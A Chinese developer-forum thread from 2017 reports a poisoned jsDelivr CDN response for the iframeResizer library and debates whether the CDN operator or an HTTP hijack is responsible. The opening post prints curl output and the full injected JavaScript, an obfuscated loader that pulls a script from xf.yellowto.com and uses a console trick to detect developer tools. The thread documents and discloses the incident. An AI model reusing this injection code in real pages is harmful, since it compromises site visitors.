这是一个创建于 2898 天前的主题,其中的信息可能已经有所发展或是发生改变。
$ curl https://cdn.jsdelivr.net/gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js -v * Trying 101.66.227.63... * TCP_NODELAY set * Connected to cdn.jsdelivr.net (101.66.227.63) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH * successfully set certificate verify locations: * CAfile: /etc/ssl/cert.pem CApath: none * TLSv1.2 (OUT), TLS handshake, Client hello (1): * TLSv1.2 (IN), TLS handshake, Server hello (2): * TLSv1.2 (IN), TLS handshake, Certificate (11): * TLSv1.2 (IN), TLS handshake, Server key exchange (12): * TLSv1.2 (IN), TLS handshake, Server finished (14): * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): * TLSv1.2 (OUT), TLS change cipher, Client hello (1): * TLSv1.2 (OUT), TLS handshake, Finished (20): * TLSv1.2 (IN), TLS change cipher, Client hello (1): * TLSv1.2 (IN), TLS handshake, Finished (20): * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256 * ALPN, server accepted to use h2 * Server certificate: * subject: OU=Domain Control Validated; OU=PositiveSSL; CN=cdn.jsdelivr.net * start date: Apr 20 00:00:00 2014 GMT * expire date: Apr 19 23:59:59 2019 GMT * subjectAltName: host "cdn.jsdelivr.net" matched cert's "cdn.jsdelivr.net" * issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA * SSL certificate verify ok. * Using HTTP2, server supports multi-use * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x7f9e9c00aa00) > GET /gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js HTTP/2 > Host: cdn.jsdelivr.net > User-Agent: curl/7.54.0 > Accept: */* > * Connection state changed (MAX_CONCURRENT_STREAMS updated)! < HTTP/2 200 < date: Thu, 02 Nov 2017 18:49:08 GMT < content-type: application/x-Javascript < content-length: 682 < cache-control: max-age=604800 < age: 1 < x-via: 1.1 tongwangtong17:3 (Cdn Cache Server V2.0), 1.1 angtong122:10 (Cdn Cache Server V2.0) < * Connection #0 to host cdn.jsdelivr.net left intact (function(){try{var e="_z__",t="http://cdn.jsdelivr.net//gh/davidjbradshaw/[email protected]/js/iframeResizer.min.js",r="http://xf.yellowto.com/?tsliese=27312832",c=document,n=c.currentScript,a=c.getElementsByTagName("head")[0],i=function(e,t){var r=c.createElement("script");r.type="text/Javascript",t&&(r.id=t),r.src=e,a.appendChild(r)},s=setInterval(function(){var e=new Image,t=window.console;Object.defineProperty(e,"id",{get:function(){e.referrerPolicy="no-referrer",e.src="http://app.baidu.com/?d?",clearInterval(s)}}),t&&(t.log(e),t.clear())},2e3);c.getElementById(e)||self==top&&i(r,e),n&&(n.defer||n.async)?i(t):c.write('<script src="'+t+'"><\/script>')}catch(e){}})()% 里面的 xf.yellowto.com ,是个广告脚本。 因为走了 Https,所以可能性如下:
- 官方干的;
- 网宿 CDN 干的( quantl 是网宿参股公司,quantl 国内节点为网宿实际运营);
- CDN 回原站走了 HTTP,被国家劫持?
 | 1 sexrobot OP jsdelivr 响应很快,确认是 CDN 服务商网宿投毒,现在已经全部切换回了 CloudFlare。 |
 | 3 WoadZS 2017-11-03 04:49:37 +08:00 jsdelivr 官方的回复是并不确定问题所在,只是在等待网宿回复,切换回 CloudFlare 也是临时性的举动。 |
 | 4 RqPS6rhmP3Nyn3Tm 2017-11-03 05:32:49 +08:00 via iPhone 网宿作为 cdn 企业也会干这种事?以后谁敢用啊 |
 | 6 n329291362 2017-11-03 08:10:59 +08:00 emmmm 我们这里用的七牛融合 cdn 也遇到了一样的脚本 |
| 7 n329291362 2017-11-03 08:11:24 +08:00 全程 https 不知道 看来应该是 cdn 投的 |
 | 8 miyuki 2017-11-03 08:12:40 +08:00 via Android 卧槽 |
 | 9 oott123 2017-11-03 08:50:34 +08:00 via Android 我猜应该是回源 http 被劫持了…这听起来太可怕了 |
 | 10 wsy2220 2017-11-03 12:16:37 +08:00 明显回源的时候被劫持了 |
 | 11 wwwwzf 2020-12-04 08:35:44 +08:00 用得少 |
Select Language